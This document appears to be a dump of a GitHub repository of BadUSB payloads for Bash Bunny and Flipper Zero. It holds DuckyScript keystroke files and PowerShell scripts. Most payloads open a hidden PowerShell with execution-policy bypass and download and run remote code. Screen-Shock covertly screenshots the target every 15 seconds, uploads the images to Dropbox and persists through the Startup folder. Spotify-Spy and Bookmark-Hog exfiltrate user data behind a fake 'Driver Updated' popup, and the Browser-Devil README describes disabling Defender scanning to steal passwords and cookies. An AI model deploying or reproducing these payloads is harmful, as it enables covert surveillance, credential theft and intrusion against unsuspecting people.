<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# RanFunWare
A payload to prank your friends into thinking their computer got hit with ransomware.
## Description
This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/RanFunWare/payload.txt
================================================
REM Title: RanFunWare
REM Author: atomiczsec
REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/RanFunWare/r.ps1
================================================
#Hides Desktop Icons
$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
Get-Process "explorer"| Stop-Process
#Changes Background
#URL For the Image of your choice (Wanna Cry Ransomware Background)
$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
Invoke-WebRequest $url -OutFile C:\temp\test.jpg
$setwallpapersrc = @"
using System.Runtime.InteropServices;
public class Wallpaper
{
public const int SetDesktopWallpaper = 20;
public const int UpdateIniFile = 0x01;
public const int SendWinIniChange = 0x02;
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
public static void SetWallpaper(string path)
{
SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
}
}
"@
Add-Type -TypeDefinition $setwallpapersrc
[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
#Pop Up Message
function MsgBox {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True)]
[Alias("m")]
[string]$message,
[Parameter (Mandatory = $False)]
[Alias("t")]
[string]$title,
[Parameter (Mandatory = $False)]
[Alias("b")]
[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
[string]$button,
[Parameter (Mandatory = $False)]
[Alias("i")]
[ValidateSet('None','Hand','Question','Warning','Asterisk')]
[string]$image
)
Add-Type -AssemblyName PresentationCore,PresentationFramework
if (!$title) {$title = " "}
if (!$button) {$button = "OK"}
if (!$image) {$image = "None"}
[System.Windows.MessageBox]::Show($message,$title,$button,$image)
}
MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning
================================================
FILE: BashBunny/payloads/Screen-Shock/I.bat
================================================
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: BashBunny/payloads/Screen-Shock/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Screen-Shock
This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds
Then the contents will then be sent to the DropBox for viewing pleasure
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Screen-Shock/c.ps1
================================================
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
while(1){
Add-Type -AssemblyName System.Windows.Forms,System.Drawing
$screens = [Windows.Forms.Screen]::AllScreens
$top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
$left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
$width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
$height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
$bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
$bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
$graphics.Dispose()
$bmp.Dispose()
start-sleep -Seconds 15
"$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}
================================================
FILE: BashBunny/payloads/Screen-Shock/payload.txt
================================================
REM Title: Screen-Shock
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Target: Windows 10
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
================================================
FILE: BashBunny/payloads/Screen-Shock/placeholder
================================================
================================================
FILE: BashBunny/payloads/Spotify-Spy/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Spotify+Spy!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Spotify-Spy
This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
## Description
Have you ever been too afraid to ask your co-worker for what song that was or what playlist this is? Fear no more!! Spotify-Spy will grab their spotify username for you so you dont have to socially interact with anyone!
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Spotify-Spy/SS.ps1
================================================
#Spotify-Spy
# See if file is a thing
Test-Path -Path "$env:APPDATA\Spotify\Users"
#Create varible for file name
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt"
# Gets the name of the spotify user
cd "$env:APPDATA\Spotify\Users"
Get-ChildItem > $F1
# Copy Spotify User to Temp Directory to get sent to Dropbox
Copy-Item "$F1" -Destination "$env:tmp/$F1"
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
rm $F1
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: BashBunny/payloads/Spotify-Spy/payload.txt
================================================
REM Title: Spotify-Spy
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10
Q DELAY 2000
Q GUI r
Q DELAY 500
Q STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
Q ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Water-UnMark/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Water-UnMark
A payload to get rid of the ugly windows activation watermark.
## Description
This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
## Getting Started
### Dependencies
* Unactivated Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Water-UnMark/payload.txt
================================================
REM Title: Water-UnMark
REM Author: atomiczsec
REM Target OS: Windows 10
REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
DELAY 2000
GUI r
DELAY 100
STRING powershell Start-Process powershell -verb runAs
DELAY 1000
ALT Y
DELAY 1000
STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
ENTER
DELAY 100
STRING Restart-Computer -Force
ENTER
================================================
FILE: BashBunny/payloads/Water-UnMark/placeholder
================================================
================================================
FILE: BashBunny/payloads/cApS-Troll/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# cApS-Troll
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Description
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Define the `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/cApS-Troll/a.ps1
================================================
while (1){
Start-Sleep -Second 45
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
}
================================================
FILE: BashBunny/payloads/cApS-Troll/payload.txt
================================================
REM Title: cApS-Troll
REM Author: atomiczsec
REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/placeholder
================================================
================================================
FILE: FlipperZero/payloads/Bookmark-Hog/BH.ps1
================================================
#Bookmark-Hog
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/Bookmark-Hog/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Bookmark-Hog/payload.txt
================================================
REM Title: Bookmark-Hog
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate bookmarks to the FlipperZero
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
================================================
FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Devil!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Browser-Devil
A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
## Description
This payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe
This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
Finally, dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Admin Priveladges on the Device you are targeting
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
